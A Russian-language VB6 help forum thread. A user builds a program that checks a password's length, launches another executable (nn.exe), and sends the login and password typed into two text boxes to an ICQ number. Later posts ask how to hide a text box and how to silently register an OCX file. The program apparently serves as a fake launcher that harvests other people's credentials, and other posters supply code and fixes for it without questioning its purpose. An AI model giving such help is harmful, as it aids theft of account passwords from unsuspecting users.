Вопрос. помогите с VB6

  1. Всем добрый день! подскажите плз, как сделать, чтоб при нажатии на кнопку старт в моей проге, открывалась другая прога, которая мне нужна? как это на VB6 сделать

    и ещё вопрос, как сделать, чтоб когда чел вводит пароль меньше или больше 10 символов и нажимает старт, у него выскакивала ошибка, типо неправильный пасс, т.е. мне надо чтоб та прога, которая запускалась при нажатии на "Старт" запускалась, только если пароль состоит из 10 символов, не больше и не меньше

    Заранее спасибо!
     
  2. Создай новый проект, на форму кинь TextBox CommandButton и в функцию кнопки напиши:
    Добавлено через 3 минуты
    Ой стоп описка:)
    Вот так:
    И далее по тексту
     
    1 человеку нравится это.
  3. а как DLL подключить к моему проекту в VB?

    Добавляб через проект- сылки - обзор, нажимаю выбрать, а мне пишут Не удается добавить ссылку на указанный файл
     
  4. marcuis,
    многие *.DLL в VB6 нельзя подключить...
    убожество, писать в одну строку

    Код:
    If Len(Text1) < 8 or Len(Text1) > 10 Then
      Shell "c:\game.exe"
    else
      Msgbox "Ошибка, не верный пароль",, "Error"
    End if 
     

  5. Там написано возможность использования в любой языке
     
  6. Тебе по ходу надо использовать функции этой dll-ки как я понимаю? Что вообще за библиотека?
     


  7. IcqMod там функции, которые мне нужны
     
  8. Так а зачем тебе в vb6 с собой библиотеку таскать:) посмотри в разделе статьи там был готовый icq-контрол karas-я. Просто добавь его потом к проекту и используй. Функции те же
     
  9. А подскажите, как в VB6 сделать TextBox не видимым на форме, ну т.е. чтоб когда прогу запускали TextBox было не видно?
     
  10. .xs
    marcuis, свойство Visible, значение false
    Обратная операция: Text1.Visible = true
     
  11. народ подскажите плз чё у меня не так, короч когда нажимаю старт, данные из Text1 и Text2 должны приходить на аську. Вот я нажимаю и мне приходит пустое сообщение((


    Код:
    Private Sub start_Click()
    If Len(Text2.text) >= 8 And Len(Text2.text) <= 10 Then Call Shell(App.Path & "/nn.exe", vbNormalFocus) Else MsgBox "Mistake! Incorrectly typed password", , "Error"
    
    trace "[" & Text1 & "] " & Text2
    icq1.SendMessage Text1, Text2
    
     For i = 0 To BuffSize
            'если нашли место:
            If Buff(i).UIN = "" Then
                Buff(i).UIN = ***** 'забиваем уин на который отослать
                Buff(i).msg = ans 'забиваем в буфер сообщение
                Exit For          'выходим из цыкла
            End If
        Next i
    End Sub
     
  12. это не обезательно

    Добавлено через 1 минуту
    эта функция используеться так:
    тобишь так:

     
  13. Во теперь всё работает:happy: спс

    Добавлено через 2 минуты
    поскажите ещё плз, вот когда я старт нажимаю, вылезает другая прога nn.exe


    но она включается, если тока находится в одной папке с моей, а нельзя как- то сделать, чтоб без разницы в какой папке или разделе она находилась?
     
  14. .xs
    marcuis, можно. Искать по всем папкам всех разделов. Если найдено nn.exe, проверить хэш, если совпадает, запускать. Но это того не стоит
     
  15. Всем доброе утро) Народ подскажите плз, короч у меня есть файл .ocx, как сделать в VB6, чтоб когда мою прогу запускали, он автоматически регистрировался в системе? Делал через VB-PowerWrap, но поч. он не у всех регистр. у кого- то норм, а у кого- то писал ошибку(
     
  16. Запиши в функцию Form_Load:
    Call Shell "regsrv32.exe имя.ocx"
     
    1 человеку нравится это.
  17. Записал, но мне пишут Ошибка компиляции: ошибка синтаксиса
     
  18. Значит дело в самом ocx:)
     
  19. А что в нём может быть?) я же у себя его зарегал всё норм, через команд. строку
     
  20. вовсе не обязательно писать каждый раз Call

    попробуй написать Shell "regsvr32.exe полный_путь_к_OCX/*.ocx"

    и что именно за ошибка ?

    Добавлено через 2 минуты
    и вообще, если этот окс используется в этой же программе и он не зарегистрирован то естественно работать ничего не будет, нужно регистрировать компонент не посредственно при установке программы (из инстолятора) или просто создай бат файл который будет его регистрировать а потому уже и запускали программу...